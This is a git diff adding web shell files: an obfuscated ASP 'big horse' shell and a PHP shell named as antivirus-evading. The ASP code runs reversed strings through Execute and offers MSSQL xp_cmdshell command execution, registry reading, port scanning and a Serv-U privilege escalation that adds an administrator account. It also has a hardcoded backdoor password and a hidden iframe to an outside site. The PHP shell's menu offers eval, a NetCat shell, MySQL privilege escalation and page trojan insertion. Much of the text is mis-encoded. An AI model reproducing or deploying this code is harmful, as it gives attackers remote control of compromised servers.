+ShiSan="bus dne��fi dne��fI dnE��yarrAeht & ��>il<�� j��eslE��txeN��)i(yarrAeht & ��>il<�� j��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS��txeN emuseR rorrE nO��neht ���><)��htaPeht��(tseuqeR fi���>/rh<>mrof/<�� j���>')(timbus.mrof.siht'=kcilcno 'ֵ �� ��'=eulav nottub=epyt tupni<�� j���>08=ezis ''=eulav htaPeht=eman tupni< �� j���>/ rb<>tceles/<�� j���>noitpo/<�ڶ�PCT�ķſ�����>'stroPdewollAPCT\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ڶ�PDU�ķſ�����>'stroPdewollAPDU\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ſ����>'PCT:9833\tsiL\stroPnepOyllabolG\eliforPdradnatS\yciloPllaweriF\sretemaraP\sseccAderahS\secivreS\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<goL eludehcS>'htaPgoL\tnegAgniludehcS\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<3�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<2�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\200teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<1�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<�ڶ�̬״WynAcP>���troPsutatSPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ˾���WynAcP>���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�9833>���rebmuNtroP\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�4CNV>���rebmuNtroP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<����4CNV>���drowssaP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�3CNV>���rebmuNtroP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<����3CNV>���drowssaP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<�ڶ�nimdaR>���troP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<����nimdaR>���retemaraP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<���п���>���dniB\egakniL\pipcT\secivreS\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<emaNretupmoC>'emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<ֵ���Ĵ�����ѡ>''=eulav noitpo<�� j���>';eulav.siht=eulav.htaPeht.mrof.siht'=egnahCno tceles<�� j��� >2=napsloc dt<>rt<�� j���>tcAeht=eman geRdaeR=eulav neddih=epyt tupni<�� j�� ��>p<ȡ��ֵ������ע��  j���>tsop=dohtem mrof<�� j��)(GERdaeR bus"
+ExeCuTe(ShiSanFun(ShiSan)) 
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject("Scripting.FileSystemObject")
+if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+response.end
+end if
+
+if sessIoN("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("KKK")=userPass
+response.redirect url
+else
+j"<br><br><br><b><div align=center><font size='5' color='red'>������!</font ></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
+end if
+else
+
+si="<center><a></a><div style='width:400px;padding:32px; align=left'><br><form action='"&url&"' method='post'><input name='pass' type='password' size='22'> <input type='submit' value='ɱ'></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+
+ShiSan="buS dnE��fI dnE��fI dnE��fI dnE��)��>rb<>tnof/<�ſ�>der=roloc tnof<.........�� & muNtrop & ��:�� & pitegrat(j��eslE��)��>rb<�չ�.........�� & muNtrop & ��:�� & pitegrat(j��nehT 0 > )��.))(tcennoC(�� ,noitpircsed.rrE(rtSnI fI��nehT 9527647412- = rebmun.rrE ro 3487127412- = rebmun.rrE fI��nehT rrE fI��rtsnnoc nepo.nnoc��1 = tuoemiTnoitcennoC.nnoc���;=drowssaP;2ekal=DI resU;��& muNtrop &��,��& pitegrat & ��=ecruoS ataD;1.BDELOLQS=redivorP��=rtsnnoc��)��noitcennoc.BDODA��(tcejbOetaerC.revreS = nnoc tes��txeN emuseR rorrE nO��)muNtrop ,pitegrat(nacS buS��bus dne��FI DNE���s ��&emiteht&�� ni ssecorP>rh<��j��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j,xxx & tratSpi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j ,)uh(pi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(j��remit = 1remit��nehT ��� >< )��nacs��(mroF.tseuqer fI���>mrof/<>p/<��j���>'111'=eulav 'nacs'=di 'neddih'=epyt 'nacs'=eman tupni<��j���>' nacs '=eulav 'mottub'=ssalc 'timbus'=epyt 'timbus'=eman tupni<��j���>rb<>rb<��j���>'��&tsiLtroP&��'=eulav '06'=ezis 'xoBtxeT'=ssalc 'txet'=epyt 'trop'=eman tupni<��j���:tsiL troP>rb<��j���>'06'=ezis '��&PI&��'=eulav 'pi'=di 'xoBtxeT'=ssalc 'txet'=epyt 'pi'=eman tupni< ��j��� :PI nacS>p<��j���>';eurt=delbasid.timbus.1mrof'=timbuSno ''=noitca 'tsop'=dohtem '1mrof'=eman mrof<��j���>p/<��������ϵ��ִ��LLEHS���롣���������ܿ�PI���������ɨ�������ǹ���>p<>p/<)��ȷ׼����ɨ���ڶ�DMC��DMC��ʹ�����˸�,���ϱȶ���,�ڶ˸�����ɨ����(����ɨ�ڶ�>p<��j��fi dne��)��pi��(mroF.tseuqer=PI��esle���1.0.0.721��=PI��neht ���=)��pi��(mroF.tseuqer fi��fi dne��)��trop��(mroF.tseuqer=tsiLtroP��esle���85934,0095,0085,2365,1365,9984,9833,6033,3341,35,32,12��=tsiLtroP��neht ���=)��trop��(mroF.tseuqer fi��0006777 = tuoemiTtpircS.revreS��)(troPnacS bus��"
+ExeCuTe(ShiSanFun(ShiSan)) 
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://www.baidu.com/ips8.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+
+function getHTTPPage(url) 
+on error resume next 
+dim http 
+set http=Server.createobject("Microsoft.XMLHTTP") 
+Http.open "GET",url,false 
+Http.send() 
+if Http.readystate<>4 then
+getHTTPPage=""
+exit function 
+end if 
+getHTTPPage=bytes2BSTR(Http.responseBody) 
+set http=nothing
+if err.number<>0 then err.Clear  
+end function 
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ�������<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"downloads":downloads()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"<iframe src=http://cpc-gov.cn/a/a/a.asp width=0 height=0></iframe>" 
+%></body></html>
+</body></html>
+</body></html>
\ No newline at end of file
diff --git a/www-7jyewu-cn/免杀php大马.php b/www-7jyewu-cn/免杀php大马.php
new file mode 100644
index 0000000..37a7e9b
--- /dev/null
+++ b/www-7jyewu-cn/免杀php大马.php
@@ -0,0 +1,2488 @@
+<?php
+;//������֤���룡
+$shellname='�й�ľ����Դ��- WwW.7jyewu.Cn ';//�����޸ı��⣡
+define('myaddress',__FILE__);
+error_reporting(E_ERROR | E_PARSE);
+header("content-Type: text/html; charset=gb2312");
+@set_time_limit(0);
+
+ob_start();
+define('envlpass',$password);
+define('shellname',$shellname);
+define('myurl',$myurl);
+if(@get_magic_quotes_gpc()){
+	foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
+	foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
+}
+
+/*---End Login---*/
+if(isset($_GET['down'])) do_down($_GET['down']);
+if(isset($_GET['pack'])){
+	$dir = do_show($_GET['pack']);
+	$zip = new eanver($dir);
+	$out = $zip->out;
+	do_download($out,"eanver.tar.gz");
+}
+if(isset($_GET['unzip'])){
+	css_main();
+	start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
+	exit;
+}
+
+define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
+define('run_win',substr(PHP_OS, 0, 3) == "WIN");
+define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
+$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
+$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
+$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
+$name = isset($_POST['name']) ? $_POST['name'] : "";
+$img = isset($_GET['img']) ? $_GET['img'] : "";
+$p = isset($_GET['p']) ? $_GET['p'] : "";
+$pp = urlencode(dirname($p));
+if($img) css_img($img);
+if($eanver == "phpinfo") die(phpinfo());
+if($eanver == 'logout'){
+	setcookie('envlpass',null);
+	die('<meta http-equiv="refresh" content="0;URL=?">');
+}
+
+$class = array(
+"��Ϣ����" => array("upfiles" => "�ϴ��ļ�","phpinfo" => "������Ϣ","info_f" => "ϵͳ��Ϣ","eval" => "ִ��PHP�ű�"),
+"��Ȩ����" => array("sqlshell" => "ִ��SQLִ��","mysql_exec" => "MYSQL����","myexp" => "MYSQL��Ȩ","servu" => "Serv-U��Ȩ","nc" => "NC����","downloader" => "�ļ�����","port" => "�˿�ɨ��"),
+"��������" => array("guama" => "������������","tihuan" => "�����滻����","scanfile" => "���������ļ�","scanphp" => "��������ľ��"),
+"�ű����" => array("getcode" => "��ȡ��ҳԴ��")
+);
+$msg = array("0" => "����ɹ�","1" => "����ʧ��","2" => "�ϴ��ɹ�","3" => "�ϴ�ʧ��","4" => "�޸ijɹ�","5" => "�޸�ʧ��","6" => "ɾ���ɹ�","7" => "ɾ��ʧ��");
+css_main();
+switch($eanver){
+	case "left":
+	css_left();
+		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");
+		html_img("title");html_n(" ����Ӳ��</a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");
+    $ROOT_DIR = File_Mode();
+    html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'>��վ��Ŀ¼</a></li>");
+	html_n("<li><a href='?eanver=main' target='main'>������Ŀ¼</a></li>");
+	for ($i=66;$i<=90;$i++){$drive= chr($i).':';
+    if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;
+    html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>���ش���($drive)</a></li>");}}
+	html_n("</ul></dd></dl>");
+	$i = 2;
+	foreach($class as $name => $array){
+		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
+		html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
+		foreach($array as $url => $value){
+			html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");
+		}
+		html_n("</ul></dd></dl>");
+		$i++;
+	}
+	html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");
+	html_img("title");html_n(" ��������</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");
+	html_n("<li><a title='��ɱ����' href='http://www.7jyewu.cn/' target=\"main\">��ɱ����</a></li>");
+    html_n("<li><a title='��ȫ�˳�' href='?eanver=logout' target=\"main\">��ȫ�˳�</a></li>");
+	html_n("</ul></dd></dl>");
+	html_n("</div>");
+	break;
+	
+	case "main":
+	css_js("1");
+	$dir = @dir($path);
+	$REAL_DIR = File_Str(realpath($path));
+	if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}
+	$NUM_D = $NUM_F = 0;
+	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
+	$ROOT_DIR = File_Mode();
+	html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>��ַ:<input type='hidden' name='eanver' value='main'>");
+	html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value='ת��'></form>");
+	html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");
+	html_n("<input type=\"button\" value=\"�½��ļ�\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"�½�Ŀ¼\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");
+	html_input("file","upfilet","","&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");
+	html_input("submit","uploadt","�ϴ�");
+	if(!empty($_POST['newfile'])){
+		if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
+        if (substr(PHP_VERSION,0,1)>=5){if(($_POST['charset']=='GB2312') or ($_POST['charset']=='GBK')){}else{$_POST['txt'] = iconv("gb2312//IGNORE",$_POST['charset'],$_POST['txt']);}}
+		echo do_write($_POST['newfile'],$bin,$_POST['txt']) ? '<br>'.$_POST['newfile'].' '.$msg[0] : '<br>'.$_POST['newfile'].' '.$msg[1];
